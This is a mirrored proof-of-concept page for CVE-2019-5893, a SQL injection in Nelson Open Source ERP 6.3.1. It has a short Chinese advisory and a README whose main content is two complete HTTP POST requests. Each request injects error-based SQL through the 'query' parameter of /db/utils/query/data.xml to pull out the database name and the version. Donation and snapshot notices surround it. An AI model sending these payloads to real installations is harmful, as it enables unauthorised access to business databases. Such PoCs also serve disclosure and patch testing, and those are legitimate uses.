Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-5893 PoC — Nelson Open Source ERP SQL注入漏洞

Source
https://github.com/EmreOvunc/OpenSource-ERP-SQL-Injection
Associated Vulnerability
Title:Nelson Open Source ERP SQL注入漏洞 (CVE-2019-5893)
Description:Nelson Open Source ERP是一套开源的ERP(企业资源计划)系统。该系统包括订单管理、文件管理、财务管理和库存管理等。 Nelson Open Source ERP 6.3.1版本中的db/utils/query/data.xml页面存在SQL注入漏洞。远程攻击者可借助‘query’参数利用该漏洞执行SQL命令。
Description
CVE-2019-5893 | OpenSource ERP application has SQL Injection vulnerability.
Readme
# OpenSource-ERP-SQL-Injection
[OpenSource ERP](http://www.nelson-it.ch/) application has SQL Injection vulnerability.

## CVE-2019-5893
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5893

https://www.exploit-db.com/exploits/46118

# PoC - Get DB name
```
POST /db/utils/query/data.xml HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: http://172.16.118.142:8024
Referer: http://172.16.118.142:8024/
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Cookie: MneHttpSessionId8024=15471285865828
Host: 172.16.118.142:8024
Content-Length: 423
Accept-Encoding: gzip, deflate
Connection: close

sqlend=1&query=%27%7c%7ccast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7c(SELECT+current_database())%7c%7cchr(95)%7c%7cchr(33)%7c%7cchr(64))+as+numeric)%7c%7c%27&schema=mne_application&table=userpref&cols=startweblet%2cregion%2cmslanguage%2cusername%2cloginname%2cpersonid%2clanguage%2cregionselect%2ctimezone%2ccountrycarcode%2cstylename%2cusername%2cstartwebletname&usernameInput.old=session_user&mneuserloginname=test
```
![alt tag](https://emreovunc.com/blog/en/OpenERP-SQL-DBname.png)

# PoC - Get DB version
```
POST /db/utils/query/data.xml HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: http://172.16.118.142:8024
Referer: http://172.16.118.142:8024/
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Cookie: MneHttpSessionId8024=15471285865828
Host: 172.16.118.142:8024
Content-Length: 414
Accept-Encoding: gzip, deflate
Connection: close

sqlend=1&query=%27%7c%7ccast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7c(SELECT+VERSION())%7c%7cchr(95)%7c%7cchr(33)%7c%7cchr(64))+as+numeric)%7c%7c%27&schema=mne_application&table=userpref&cols=startweblet%2cregion%2cmslanguage%2cusername%2cloginname%2cpersonid%2clanguage%2cregionselect%2ctimezone%2ccountrycarcode%2cstylename%2cusername%2cstartwebletname&usernameInput.old=session_user&mneuserloginname=test
```
![alt tag](https://emreovunc.com/blog/en/OpenERP-SQL-DBversion.png)
File Snapshot

 [4.0K]  /data/pocs/951114bf6833bb699a56fb6312f279fc9dd3d0a8
├── [ 917]  PoC-Request-1
├── [ 926]  PoC-Request-2
└── [2.2K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.